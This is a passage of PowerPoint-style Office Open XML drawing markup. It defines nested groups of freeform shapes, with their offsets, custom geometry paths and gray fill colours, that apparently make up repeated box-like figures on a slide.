                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67E3D035-314B-4DB4-AD37-40549994105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16" name="Freeform 1942">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F3624E2-1D4F-4DC4-9803-855E26A0760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17" name="Freeform 1943">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E043F345-3AE7-4079-A163-BC0D7A9D4042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18" name="Freeform 1944">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4214A9F3-970B-4B5D-907E-9566CDE48A9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408" name="Group 1945">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AB9650A-2D90-4DEF-868B-4CEA99C87D7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079" y="2393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409" name="Freeform 1946">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AA51C76-E25B-4311-9340-563907D5F83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10" name="Freeform 1947">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD764199-0106-44CD-A927-F1E390C4FC1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11" name="Freeform 1948">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E649AC0A-36F7-4CA9-BBD4-0D511CA712B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12" name="Freeform 1949">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1E7A9D6-E1DD-4D6E-B482-1FE2FC1F1819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13" name="Freeform 1950">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FD8C144-7512-4BAB-807E-59236D4DBBF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2342" name="Group 1951">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02E35E01-1342-4F5E-AD54-60A94B4D8E5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079" y="1934"/>
                    <a:ext cx="1300" cy="574"/>
                    <a:chOff x="1079" y="1934"/>
                    <a:chExt cx="1300" cy="574"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:grpSp>
                  <p:nvGrpSpPr>
                    <p:cNvPr id="2374" name="Group 1952">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04E2A55E-9A95-4F80-8F14-2C77392A446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946" y="1934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399" name="Freeform 1953">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{058BF30B-8C67-49D5-AABF-6D16D8903CF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00" name="Freeform 1954">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61CFA99C-6100-4C69-BF65-9A29C60A972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01" name="Freeform 1955">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD412662-EE71-4CE3-8477-F2AFCAA14C8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02" name="Freeform 1956">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B083FE0-3DF8-406F-90E0-20D901788850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403" name="Freeform 1957">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51BAA2B7-FAFC-416E-A5FF-0CB55E597D5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375" name="Group 1958">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CDEEF78-5379-44AB-B30B-D33A005D5CE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728" y="1992"/>
                      <a:ext cx="434" cy="341"/>
                      <a:chOff x="585" y="1098"/>
                      <a:chExt cx="662" cy="521"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="2394" name="Freeform 1959">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9C42380-DEBB-4A8F-8335-869AC24959C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95" name="Freeform 1960">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8887F373-70CC-40A0-A2B7-29C6EEAF81C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96" name="Freeform 1961">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F032524-2E65-4427-9E94-1EF6AF8BC61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97" name="Freeform 1962">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAEE76D6-E3FD-475C-88BB-0C83591EC62E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98" name="Freeform 1963">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4893DCFA-4E23-43E5-8027-F7792177EDB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376" name="Group 1964">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FE0C086-56BB-4652-BB61-5B78A753D52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512" y="2050"/>
                      <a:ext cx="433" cy="342"/>
                      <a:chOff x="585" y="1098"/>
                      <a:chExt cx="662" cy="521"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="2389" name="Freeform 1965">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD2BDDE6-9F5B-4DE6-9F4D-7F5CCBB8BB9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90" name="Freeform 1966">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{609391B4-4343-490F-8C67-EAD12F67A82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91" name="Freeform 1967">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F208A83-98AC-4B58-8245-F8DD0754C87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92" name="Freeform 1968">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F65D828-E97B-44BE-859F-1018052FA685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93" name="Freeform 1969">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10598C0D-3869-41DB-81A7-1C7F08B763B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377" name="Group 1970">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{836F4C8B-89E8-4974-B99D-1C8C5E184A6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295" y="2109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384" name="Freeform 1971">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E81FE1A6-0AD4-4DDF-918F-51BBAC10CA4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85" name="Freeform 1972">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{810F5A66-38D6-493D-8F01-BDFCC27ACB9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86" name="Freeform 1973">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7FB97B6-1C3B-4CDE-8873-1FB3CA5DE66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87" name="Freeform 1974">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F949F5-8AE1-446E-90CE-199F91C442A5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88" name="Freeform 1975">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B677BA2-6DAC-41EB-AE40-67CBC5067F8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378" name="Group 1976">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{677F0935-0606-4CBB-92AE-21BF9A48E6F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079" y="2167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379" name="Freeform 1977">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DF09D6A-E91C-4CB9-B790-5DD788031F5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80" name="Freeform 1978">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6252083-1315-4CEF-8426-A41C4E5B1AC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81" name="Freeform 1979">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAE5FB70-2D32-408F-BFE7-2BE80BC2B91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82" name="Freeform 1980">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D15B94C7-05BB-4894-ABA2-2F27ECDC93FB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83" name="Freeform 1981">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A97B2711-C09D-421C-B7E8-478312C6E53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2343" name="Group 1982">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5704C8E6-6AC4-4ED0-997C-F397A1879B2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079" y="1709"/>
                    <a:ext cx="1300" cy="574"/>
                    <a:chOff x="1079" y="1709"/>
                    <a:chExt cx="1300" cy="574"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:grpSp>
                  <p:nvGrpSpPr>
                    <p:cNvPr id="2344" name="Group 1983">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{136AE62D-F72F-4B0B-AA28-8A7C28B61F8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946" y="1709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369" name="Freeform 1984">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC142786-C96C-48E6-9EF1-A67EC83CBEA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70" name="Freeform 1985">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E1022B2-3EF7-4ECC-A2F7-5031A090119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71" name="Freeform 1986">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCFEF754-11DC-4582-9E4F-F9A13B29411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72" name="Freeform 1987">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6C6BDD8-C8C2-4C16-B956-A1C71A1BC9FA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73" name="Freeform 1988">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2A16594-D08E-4A8A-9BC3-35D419FBBDC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345" name="Group 1989">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{285B8126-7D52-4865-8A2A-FD2BF1A99AD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728" y="1767"/>
                      <a:ext cx="434" cy="341"/>
                      <a:chOff x="585" y="1098"/>
                      <a:chExt cx="662" cy="521"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="2364" name="Freeform 1990">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BD6E5FD-64E3-4FC5-B705-05C865110AC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65" name="Freeform 1991">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A6CC6B-C3CA-4755-B581-D7266C52DEE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66" name="Freeform 1992">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B0F433A-7AF1-4279-95C0-9FA1CB48673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67" name="Freeform 1993">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{375DBBAA-040A-49A1-9A30-ECD3CDBDBCCB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68" name="Freeform 1994">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B649A8E-FADE-4940-933D-962879B423A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346" name="Group 1995">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D792C882-DA2B-4BBD-9B7D-128A9BCB6EA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512" y="1825"/>
                      <a:ext cx="433" cy="342"/>
                      <a:chOff x="585" y="1098"/>
                      <a:chExt cx="662" cy="521"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="2359" name="Freeform 1996">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4418A07D-AF69-450A-8933-9C35BC55BCB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60" name="Freeform 1997">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69562612-2B02-415A-9BC8-F4DDB53D10D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61" name="Freeform 1998">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83A5FB6F-67C8-411B-A4B9-72E8502F441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62" name="Freeform 1999">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDB6E77E-EB06-493C-9BD5-417214B8150B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63" name="Freeform 2000">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8FB773B-1F92-442C-BD92-80F6748F15E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347" name="Group 2001">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10C613E6-6DEC-49EB-8D75-B30B1D74108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295" y="1884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354" name="Freeform 2002">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C74531A-0DDB-48C7-B453-353F2ABE0DD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55" name="Freeform 2003">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4218DE-87BA-41C0-9E67-6DF6C4C522E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56" name="Freeform 2004">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2369A99A-CCF5-4B2D-A5B9-95CA761FA26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57" name="Freeform 2005">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4DDC319-1E24-4F11-82E9-8FE78B1FDE33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58" name="Freeform 2006">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C9AF8EB-62ED-4DFA-917C-2F1893BDA64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2348" name="Group 2007">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A79647A0-ACE7-40B9-8ABB-C4716F10F28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079" y="1942"/>
                      <a:ext cx="433" cy="341"/>
                      <a:chOff x="585" y="1098"/>
                      <a:chExt cx="662" cy="521"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="2349" name="Freeform 2008">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82DA1BE6-1131-4C5D-B486-0EE802F0019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331" cy="432"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 1866"/>
                          <a:gd name="T1" fmla="*/ 500 h 2433"/>
                          <a:gd name="T2" fmla="*/ 0 w 1866"/>
                          <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                          <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                          <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                          <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                          <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                          <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                          <a:gd name="T9" fmla="*/ 0 h 2433"/>
                          <a:gd name="T10" fmla="*/ 0 w 1866"/>
                          <a:gd name="T11" fmla="*/ 500 h 243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</a:cxnLst>
                        <a:rect l="0" t="0" r="r" b="b"/>
                        <a:pathLst>
                          <a:path w="1866" h="2433">
                            <a:moveTo>
                              <a:pt x="0" y="500"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="2433"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="1866" y="1932"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="1866" y="1001"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="1866" y="0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D6D6D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50" name="Freeform 2009">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C5A0884-BC8D-490C-A986-70AAC3229F3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3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303030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51" name="Freeform 2010">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73E7D0C3-19D3-4358-A2AC-8A0A7C04113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6" y="1186"/>
                        <a:ext cx="331" cy="433"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 1866"/>
                          <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                          <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                          <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                          <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                          <a:gd name="T5" fmla="*/ 0 h 2434"/>
                          <a:gd name="T6" fmla="*/ 0 w 1866"/>
                          <a:gd name="T7" fmla="*/ 501 h 2434"/>
                          <a:gd name="T8" fmla="*/ 0 w 1866"/>
                          <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="1866" y="1933"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="1866" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="501"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="2434"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="828282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52" name="Freeform 2011">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11C28164-4C3F-478A-8C79-B8EC9D38C374}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvSpPr>
                        <a:spLocks noEditPoints="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="585" y="1186"/>
                        <a:ext cx="331" cy="433"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                          <a:gd name="T1" fmla="*/ 501 h 2434"/>
                          <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                          <a:gd name="T3" fmla="*/ 437 h 2434"/>
                          <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                          <a:gd name="T5" fmla="*/ 437 h 2434"/>
                          <a:gd name="T6" fmla="*/ 234 w 1866"/>
                          <a:gd name="T7" fmla="*/ 64 h 2434"/>
                          <a:gd name="T8" fmla="*/ 234 w 1866"/>
                          <a:gd name="T9" fmla="*/ 64 h 2434"/>
                          <a:gd name="T10" fmla="*/ 0 w 1866"/>
                          <a:gd name="T11" fmla="*/ 0 h 2434"/>
                          <a:gd name="T12" fmla="*/ 0 w 1866"/>
                          <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                          <a:gd name="T14" fmla="*/ 234 w 1866"/>
                          <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                          <a:gd name="T16" fmla="*/ 234 w 1866"/>
                          <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                          <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                          <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                          <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                          <a:gd name="T21" fmla="*/ 501 h 2434"/>
                          <a:gd name="T22" fmla="*/ 234 w 1866"/>
                          <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                          <a:gd name="T24" fmla="*/ 234 w 1866"/>
                          <a:gd name="T25" fmla="*/ 305 h 2434"/>
                          <a:gd name="T26" fmla="*/ 234 w 1866"/>
                          <a:gd name="T27" fmla="*/ 305 h 2434"/>
                          <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                          <a:gd name="T29" fmla="*/ 681 h 2434"/>
                          <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                          <a:gd name="T31" fmla="*/ 681 h 2434"/>
                          <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                          <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                          <a:gd name="T34" fmla="*/ 234 w 1866"/>
                          <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                          <a:gd name="T36" fmla="*/ 234 w 1866"/>
                          <a:gd name="T37" fmla="*/ 1753 h 243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</a:cxnLst>
                        <a:rect l="0" t="0" r="r" b="b"/>
                        <a:pathLst>
                          <a:path w="1866" h="2434">
                            <a:moveTo>
                              <a:pt x="1866" y="501"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="1632" y="437"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="1632" y="437"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="234" y="64"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="234" y="64"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="1933"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="234" y="1997"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="234" y="1997"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="1866" y="2434"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="1866" y="501"/>
                            </a:lnTo>
                            <a:close/>
                            <a:moveTo>
                              <a:pt x="234" y="1753"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="234" y="305"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="234" y="305"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="1630" y="681"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="1632" y="681"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="1632" y="2129"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="234" y="1753"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="234" y="1753"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="545454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353" name="Freeform 2012">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF686C1B-4535-4A7A-9A59-58BC828E1F5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85" y="1098"/>
                        <a:ext cx="662" cy="177"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 3732"/>
                          <a:gd name="T1" fmla="*/ 500 h 1001"/>
                          <a:gd name="T2" fmla="*/ 1866 w 3732"/>
                          <a:gd name="T3" fmla="*/ 0 h 1001"/>
                          <a:gd name="T4" fmla="*/ 3732 w 3732"/>
                          <a:gd name="T5" fmla="*/ 500 h 1001"/>
                          <a:gd name="T6" fmla="*/ 1866 w 3732"/>
                          <a:gd name="T7" fmla="*/ 1001 h 1001"/>
                          <a:gd name="T8" fmla="*/ 0 w 3732"/>
                          <a:gd name="T9" fmla="*/ 500 h 100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3732" h="1001">
                            <a:moveTo>
                              <a:pt x="0" y="500"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="1866" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="3732" y="500"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="1866" y="1001"/>
                            </a:lnTo>
                            <a:lnTo>
